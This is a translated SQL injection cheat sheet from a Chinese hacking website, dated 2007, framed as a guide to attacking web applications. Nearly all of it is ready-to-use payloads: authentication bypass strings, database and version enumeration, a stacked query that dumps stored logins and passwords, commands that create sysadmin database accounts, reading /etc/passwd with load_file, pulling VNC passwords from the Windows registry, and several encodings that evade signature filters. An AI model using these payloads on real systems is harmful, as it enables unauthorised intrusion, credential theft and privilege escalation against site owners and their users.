| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

SQL注射资料    热      【字体：小 大】
SQL注射资料
作者：zeroday    文章来源：blacksecurity    点击数：    更新时间：2007-5-3
翻译：漂浮的尘埃[S.S.T] 1． 介绍 2． 漏洞测试 3． 收集信息 4． 数据类型 5． 获取密码 6． 创建数据库帐号 7． MYSQL操作系统交互作用 8． 服务器名字与配置 9． 从注册表中获取VNC密码 10．逃避标识部分信号 11．用Char()进行MYSQL输入确认欺骗 12．用注释逃避标识部分信号 13．没有引号的字符串 1． 当服务器只开了80端口，我们几乎肯定管理员会为服务器打补丁。 最好的方法就是转到网站攻击。SQL注射是最普遍的网站攻击方法之一。 你攻击网站程序，（ASP,JSP,PHP,CGI..）比服务器或者在服务器上运行的操作系统好的多。 SQL注射是一种通过网页输入一个查询命令或者一条指令进行欺骗的方法，很多站点都是从用户的用户名，密码甚至email获取用户的参数。 他们都使用SQL查询命令。 2． 首先你用简单的进行尝试。 - Login:' or 1=1-- - Pass:' or 1=1-- - http://website/index.asp?id=' or 1=1--  这些是简单的方法，其他如下： - ' having 1=1-- - ' group by userid having 1=1-- - ' Select name FROM syscolumns Where id = (Select id FROM sysobjects Where name = 'tablename')-- - ' union select sum(columnname) from tablename-- 3．收集信息 - ' or 1 in (select @@version)-- - ' union all select @@version-- /*这个优秀 这些能找到计算机，操作系统，补丁的真实版本。 4．数据类型 oracle 扩展 -->SYS.USER_OBJECTS (USEROBJECTS) -->SYS.USER_VIEWS -->SYS.USER_TABLES -->SYS.USER_VIEWS -->SYS.USER_TAB_COLUMNS -->SYS.USER_CATALOG -->SYS.USER_TRIGGERS -->SYS.ALL_TABLES -->SYS.TAB MySQL 数据库， C:\WINDOWS>type my.ini得到root密码 -->mysql.user -->mysql.host -->mysql.db MS access -->MsysACEs -->MsysObjects -->MsysQueries -->MsysRelationships MS SQL Server -->sysobjects -->syscolumns -->systypes -->sysdatabases 5.获取密码 ';begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end -- ' and 1 in (select var from temp)-- ' ; drop table temp -- 6.创建数据库帐号 10． MS SQL exec sp_addlogin 'name' , 'password' exec sp_addsrvrolemember 'name' , 'sysadmin' 加为数据库管理员 MySQL Insert INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123')) Access CRATE USER name IDENTIFIED BY 'pass123' Postgres (requires Unix account) CRATE USER name WITH PASSWORD 'pass123' oracle CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO name; GRANT RESOURCE TO name; 7. MYSQL操作系统交互作用 - ' union select 1,load_file('/etc/passwd'),1,1,1; 这里用到load_file()函数 8.服务器名字与配置 - ' and 1 in (select @@servername)-- - ' and 1 in (select servername from master.sysservers)-- 9．从注册表中获取VNC密码 - '; declare @out binary(8) - exec master..xp_regread - @rootkey = 'HKEY_LOCAL_MACHINE', - @key = 'SOFTWARE\ORL\WinVNC3\Default', /*VNC4路径略有不同 - @value_name='password', - @value = @out output - select cast (@out as bigint) as x into TEMP-- - ' and 1 in (select cast(x as varchar) from temp)-- 10．逃避标识部分信号 Evading ' or 1=1 Signature - ' or 'unusual' = 'unusual' - ' or 'something' = 'some'+'thing' - ' or 'text' = N'text' - ' or 'something' like 'some%' - ' or 2 > 1 - ' or 'text' > 't' - ' or 'whatever' in ('whatever') - ' or 2 BETWEEN 1 and 3 11．用Char()进行MYSQL输入确认欺骗 不用引号注射（string = "%"） --> ' or username like char(37); 用引号注射(string="root"): è ' union select * from users where login = char(114,111,111,116); load files in unions (string = "/etc/passwd"): -->'unionselect 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; Check for existing files (string = "n.ext"): -->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); 12. 用注释逃避标识部分信号 -->'/**/OR/**/1/**/=/**/1 -->Username:' or 1/* -->Password:*/=1-- -->UNI/**/ON SEL/**/ECT -->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' -->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER') 13.没有引号的字符串 --> Insert INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
文章录入：IceRiver    责任编辑：admin
	上一篇文章： 135批量抓肉鸡 批量开TELNET 下一篇文章： 三顾讯时--对讯时新闻发布系统的艰难突破
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				活地运用SQL Injection做数据 数据库安全应用 使用MySQL的 MSSQL数据库SA权限入侵的感悟 XSS跨站脚本及SQL注入漏洞技 开源MySQL停止提供企业版源代 打造SQL Server2000的安全策 堵死网站被SQL注入的隐患 利用QQLive 新型QQ尾巴病毒疯 fsqh.exe - fsqh - 进程信息 怎样在不同版本SQL Server中

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.